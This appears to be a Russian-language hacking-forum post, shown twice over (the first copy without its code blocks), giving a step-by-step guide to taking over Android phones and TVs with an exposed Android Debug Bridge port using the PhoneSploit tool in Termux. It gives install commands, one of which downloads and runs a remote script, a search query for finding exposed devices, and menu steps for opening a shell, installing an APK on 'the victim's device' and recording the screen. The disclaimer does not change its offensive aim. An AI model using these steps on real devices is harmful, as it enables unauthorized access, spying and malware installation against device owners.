Дисклеймер
Данная статья написана в ознакомительных целях. Автор ни в коем случае не призывает читателей к нарушению законодательства РФ. Пожалуйста, не повторяйте действия, описанные в данной статье, предварительно не ознакомившись с главой 272 УК РФ. Все действия в данной статье осуществлялись на устройствах личного пользования.
Привет, хардовцы!
Хочу рассказать о такой уязвимости как android debug bridge(ADB), которая позволяет взломать смартфон на Android OS зная только IP-адрес.
Что такое ADB и на каком порту прослушивается можно найти в google.
Все действия будут осуществляться в нашем любимом termux:
1.Установка
Обновляем пакеты termux, и устанавливаем git:
Устанавливаем ADB , при помощи следующего скрипта :
Возвращаемся в домашнюю директорию, командой:
Устанавливаем сам Phonesploit :
2.Использование.
Далее нам необходим сам IP адрес уязвимого устройства, где же его взять? В этом деле нам поможет Для просмотра ссылки Войдиили Зарегистрируйся , можно использовать аналоги, но остановимся на нём.
В поиске вбиваем запрос следующего характера :
android debug bridge product:”Android Debug Bridge”
Получаем IP устройств с уязвимостью (к слову, в списке будут не только смартфоны, но и TV работающие на Android OS и т.д.)
Перейдем к самому скрипту, для его запуска введем следующие команды :
Мы видим следующее меню, дальнейшим действием будет подключение к уязвимому устройству, для этого мы выбираем пункт:
[3]Connect a new phone
После удачного подключения, мы можем использовать любой пункт данного меню, соответственно в пределе разумного.
Немного расшифровки по некоторым пунктам:
[4]. Access Shell on a phone - этот пункт позволяет открыть нам терминал shell и управлять устройством.
[5]. Install an apk on a phone - этот пункт позволяет установить нам apk файл на устройство жертвы. (давайте поработайте фантазией)
[6,7]. Screenshot/record a phone - позволяет сделать снимок экрана, или записать короткое видео экрана.
Данная статья написана в ознакомительных целях. Автор ни в коем случае не призывает читателей к нарушению законодательства РФ. Пожалуйста, не повторяйте действия, описанные в данной статье, предварительно не ознакомившись с главой 272 УК РФ. Все действия в данной статье осуществлялись на устройствах личного пользования.
Привет, хардовцы!
Хочу рассказать о такой уязвимости как android debug bridge(ADB), которая позволяет взломать смартфон на Android OS зная только IP-адрес.
Что такое ADB и на каком порту прослушивается можно найти в google.
Все действия будут осуществляться в нашем любимом termux:
1.Установка
Обновляем пакеты termux, и устанавливаем git:
Код:
pkg update
pkg upgrade
pkg install gitУстанавливаем ADB , при помощи следующего скрипта :
Код:
apt update > /dev/null 2>&1 && apt --assume-yes install wget > /dev/null 2>&1 && wget https://github.com/MasterDevX/Termux-ADB/raw/master/InstallTools.sh -q && bash InstallTools.sh
Код:
cdУстанавливаем сам Phonesploit :
Код:
git clone https://github.com/cyberknight777/PhoneSploit
cd PhoneSploit
bash termux.sh2.Использование.
Далее нам необходим сам IP адрес уязвимого устройства, где же его взять? В этом деле нам поможет Для просмотра ссылки Войди
В поиске вбиваем запрос следующего характера :
android debug bridge product:”Android Debug Bridge”
Получаем IP устройств с уязвимостью (к слову, в списке будут не только смартфоны, но и TV работающие на Android OS и т.д.)
Перейдем к самому скрипту, для его запуска введем следующие команды :
Код:
cd $HOME
cd PhoneSploit
python2 main_linux.pyМы видим следующее меню, дальнейшим действием будет подключение к уязвимому устройству, для этого мы выбираем пункт:
[3]Connect a new phone
После удачного подключения, мы можем использовать любой пункт данного меню, соответственно в пределе разумного.
Немного расшифровки по некоторым пунктам:
[4]. Access Shell on a phone - этот пункт позволяет открыть нам терминал shell и управлять устройством.
[5]. Install an apk on a phone - этот пункт позволяет установить нам apk файл на устройство жертвы. (давайте поработайте фантазией)
[6,7]. Screenshot/record a phone - позволяет сделать снимок экрана, или записать короткое видео экрана.
